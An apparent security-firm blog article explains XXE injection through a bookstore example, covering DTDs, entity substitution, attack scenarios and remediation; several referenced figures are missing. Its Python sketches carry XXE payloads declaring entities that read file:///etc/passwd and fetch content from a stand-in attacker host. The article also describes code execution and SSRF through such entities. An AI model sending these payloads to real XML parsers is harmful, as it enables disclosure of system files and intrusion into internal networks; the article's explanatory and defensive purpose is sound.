XML External Entity (XXE) injection was added as a new category to the OWASP Top 10 in 2017 as a result of the increased presence of this type of vulnerability in many environments. Although this attack has been possible for years, vulnerabilities found in major web applications, such as Facebook’s third-party career service and PayPal’s Ektron CMS, have brought it much-needed attention.

Attackers use XXE to exploit poorly configured XML processors that, in many cases by default, allow an external entity reference to be specified within XML documents. By uploading XML documents or by manipulating vulnerable code and third-party dependencies, attackers can abuse external entities for attacks such as remote code execution, disclosure of sensitive information, access to SMB file shares, Server-Side Request Forgery (SSRF), data extraction, internal system and port scans, and denial of service.

What is XML?

Extensible Markup Language (XML) was originally created for use among desktop publishing services but has since become a popular way for applications to exchange data with each other. It is now an extremely common data format, implemented in many types of web applications, services, and documents, and it allows two systems running different technologies to communicate. For XML data to be interpreted, an application needs an XML parser or XML processor that understands the format and can either convert the data to another format or simply output the result.

Below is a simple example of an XML document, in this case describing books, that a web application can accept as input, parse, and output. The root element of this document is “bookstore”, which contains child elements called “book”. Each “book” contains the sub-child elements “author”, “title”, and “publish_date”. If this document is sent in a request or uploaded to a web application that is configured to accept and parse XML input, the parsed output displays the sub-child elements.

Request of XML File:

Response:

Figure 1: Response from XML Request
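
As a rough illustration of the parsing step described above, the sketch below uses Python’s standard-library ElementTree module to read a bookstore document and return its sub-child elements. The element names come from the description; the book values, the BOOKSTORE_XML constant, and the list_books helper are illustrative assumptions rather than the application’s actual code.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document: element names follow the article,
# the values are made up for illustration.
BOOKSTORE_XML = """<bookstore>
  <book>
    <author>Jane Doe</author>
    <title>An Example Title</title>
    <publish_date>2017-01-01</publish_date>
  </book>
</bookstore>"""


def list_books(xml_text):
    """Parse the document and return one dict of sub-child elements per book."""
    root = ET.fromstring(xml_text)
    return [
        {child.tag: child.text for child in book}
        for book in root.findall("book")
    ]


for book in list_books(BOOKSTORE_XML):
    print(book)
```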

Impact and Risk

XXE vulnerabilities belong to the category of injection attacks and are similar to command injection (e.g. injecting shell commands) and SQL injection (injecting SQL statements). In the case of XXE, the attack targets XML itself, which gives an attacker the opportunity to exploit the backend system that parses or interprets the XML documents. The external entities vulnerability can also closely resemble Local File Inclusion (LFI) and Remote File Inclusion (RFI) exploits, in which an attacker accesses local system files or causes the application to dynamically include remote items of the attacker’s choosing, such as external files or scripts.

The XXE flaw can allow an attacker to turn the XML parser into a proxy that serves local and remote content on request. In all of these attacks the main issue is that proper input sanitization has not been performed, which allows the attacker to execute malicious commands on the vulnerable server. In addition, XML “external entities” are typically supported by default, which increases the likelihood of this type of attack occurring in production environments.

Technical Trenches

This section is geared towards application developers or system administrators who are seeking to understand why XXE vulnerabilities exist, how they work, and how to properly mitigate them. For those not looking to get deep in technical details, you can skip to the Remediation section.

What are XML external entities?

XML documents can contain “entities” that are defined within the DOCTYPE declaration and can reference remote external systems or local content on the server hosting the web application and XML parser. When the web application parses the XML document, it replaces each entity reference with the value that is specified. XML Schema Definitions (XSD, newer) and Document Type Definitions (DTD, legacy) are used to validate XML documents by declaring what structure the document will follow so the parser knows how to process it. The issue is that even though DTDs are the older, legacy way of defining a document’s structure before it is processed, they are still very commonly used by applications and can trigger XXE.

Consider the example of an XML document that uses a DTD, with its sections explained below. When the parser encounters the entity reference “&xxe;”, it replaces the reference with the value defined for the XML entity “xxe”.

XML Document Type Definition (DTD)

Figure 2: XML Document Type Definition

Request of XML File:

Response:

Figure 3: Response from XML Request
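
To make the substitution concrete, here is a minimal Python sketch in which an internal entity named “xxe” is declared in the DTD and then referenced in the document body. The entity name follows the text above; the entity value, the DTD_DOCUMENT constant, and the author_text helper are assumptions chosen for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the DTD declares an internal entity "xxe",
# and the body references it as &xxe;.
DTD_DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE bookstore [
  <!ENTITY xxe "Value defined in the DTD">
]>
<bookstore>
  <book>
    <author>&xxe;</author>
  </book>
</bookstore>"""


def author_text(xml_text):
    """Return the author text after the parser has expanded entity references."""
    root = ET.fromstring(xml_text)
    return root.findtext("book/author")


print(author_text(DTD_DOCUMENT))
```

The parser replaces the reference with the declared value before the application ever sees the element text, which is why the application itself has no chance to inspect or filter the reference.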

XXE Attack Scenario

Attackers can abuse the external functionality that XML external entities provide. Consider the following malicious XXE example, which leverages the “SYSTEM” identifier to access local content on the system hosting the PHP application and its XML parser. Declaring an entity with the “SYSTEM” identifier instructs the parser to read the entity value from the URI that follows. In many cases, an attacker can also leverage this misconfiguration to turn the XML parser into a proxy server, using it to execute Server-Side Request Forgery (SSRF) attacks, reach further into the internal network, or connect to external public servers from behind the firewall.

Figure 4: XXE Attack flow

The attack scenario continues with the same bookstore theme: a simple PHP application that accepts book input from users containing the author, title, and publish_date. This information can be sent in a POST request to the application’s website. An attacker can use an XML entity definition and the SYSTEM identifier to submit maliciously crafted XML that appears harmless to the firewall and the application, because the functionality of these services is not being directly attacked. In the examples below, the external entity “xxe” displays the contents of file:///etc/passwd, performing a rudimentary LFI-style attack.

Request of XML File:

Response:

Figure 5: XML attack POC
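
The shape of such a request can be sketched in Python without reading any file. The example below is an assumption-laden illustration: the XXE_PAYLOAD document and the external_entities helper are hypothetical, and the code only inspects the DTD with the standard-library expat bindings to show which entities carry a SYSTEM identifier. No external entity handler is installed, so the parser does not attempt to open the referenced URI.

```python
import xml.parsers.expat

# Hypothetical request body modeled on the scenario above.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE bookstore [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bookstore>
  <book>
    <author>&xxe;</author>
    <title>Example</title>
    <publish_date>2017-01-01</publish_date>
  </book>
</bookstore>"""


def external_entities(xml_text):
    """Return (entity name, system identifier) pairs declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities have no inline value; they point at a URI instead.
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


print(external_entities(XXE_PAYLOAD))
```

A vulnerable parser would go one step further than this sketch and substitute the contents of the referenced URI wherever “&xxe;” appears.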

The attacker is not confined to accessing files on the exploited machine. They can recreate an RFI-style attack in which files are accessed remotely via HTTP. This type of attack can also be used to circumvent firewalls and gain access to other internal systems within the intranet that would not normally be available to the attacker. Depending on the XML parser, it may be possible to use HTTP requests to read files from other systems on the local network that sit entirely behind the protection of external firewalls. In the example below, the file malicious.txt contains the content “Remote file accessed via http!!” and is located on the external website http://myattacksite.

Contents of malicious.txt

Figure 6: XXE File Inclusion

Request of XML File:

Response:

Figure 7: XXE File Inclusion POC
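
Whether a remote entity is actually fetched depends on the parser. As a contrasting sketch, Python’s standard-library ElementTree does not resolve external entities and instead raises a ParseError when it meets the reference. The full URL http://myattacksite/malicious.txt is an assumption built from the host and file name above, and REMOTE_PAYLOAD and parse_author are hypothetical names.

```python
import xml.etree.ElementTree as ET

# Hypothetical request body; the URL path is assumed from the text above.
REMOTE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE bookstore [
  <!ENTITY xxe SYSTEM "http://myattacksite/malicious.txt">
]>
<bookstore><book><author>&xxe;</author></book></bookstore>"""


def parse_author(xml_text):
    """Return the author text, or a rejection message if parsing fails."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree treats the unresolved external entity as an error
        # and makes no HTTP request.
        return f"rejected: {exc}"
    return root.findtext("book/author")


print(parse_author(REMOTE_PAYLOAD))
```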

When the PHP installation on the targeted web server has the “expect” module enabled, the severity increases because the attacker can achieve remote code execution via PHP. In some cases, this may also make it possible to port scan the internal network for further lateral movement and reconnaissance of the organization’s infrastructure.

Request of XML File:

Response:

Figure 8: XXE Code Execution POC

Remediation

XXE attacks can be a major risk to any organization and can result in severe consequences. The core vulnerability is that the XML parser processes untrusted data sent by any user, and that data can be malicious. However, it may not be easy, or even possible, to validate only the data present within the system identifier in the DTD. The other main issue is that many XML parsers are vulnerable to XXE attacks in their default configuration.

Therefore, the best solution is to configure the XML processor to use a local static DTD and disallow any DTD declared in the XML document. The simplest and safest way to prevent XXE attacks is to disable Document Type Definitions (DTDs) altogether, especially if they are not essential to the application’s functionality. Detailed guidance on how to disable XXE processing, or otherwise defend against XXE attacks, is presented in the XML External Entity (XXE) Prevention Cheat Sheet.

  • Avoid allowing application functionality that parses XML documents
  • Implement input validation that prevents malicious data from being defined with the SYSTEM identifier portion of the entity within the document type declaration (DTD)
  • Configure the XML parser to not validate and process any declarations within the DTD
  • Configure the XML parser to not resolve external entities within the DTD
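
One way to apply the “disable DTDs altogether” advice can be sketched in Python. This is a minimal illustration under stated assumptions, not a definitive hardening recipe: DTDForbidden and parse_untrusted are hypothetical names, and the approach simply rejects any document containing a DOCTYPE declaration before handing it to ElementTree. Other languages and parsers expose their own settings for the same purpose.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Any DOCTYPE at all is refused, so no entity can be declared.
    raise DTDForbidden(f"DOCTYPE declarations are not allowed: {name!r}")


def parse_untrusted(xml_text):
    """Parse XML from an untrusted source, refusing documents with a DTD."""
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # raises DTDForbidden on a DOCTYPE
    return ET.fromstring(xml_text)


try:
    parse_untrusted(
        '<!DOCTYPE b [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><b>&xxe;</b>'
    )
except DTDForbidden as exc:
    print("blocked:", exc)
```

The sketch parses the input twice for clarity. The third-party defusedxml package offers a comparable forbid_dtd option for applications that prefer a maintained library.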

How we can help

The Packetlabs team is composed of highly trained and experienced ethical hackers who excel at discovering, exploiting, and chaining together multiple vulnerabilities that are often overlooked. Our team members hold some of the most highly regarded certifications in the industry, including the Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), GIAC Web Application Penetration Tester (GWAPT), and GIAC Exploit Researcher and Advanced Penetration Tester (GXPN) certifications. Please contact us to learn more or speak to us about how we can help.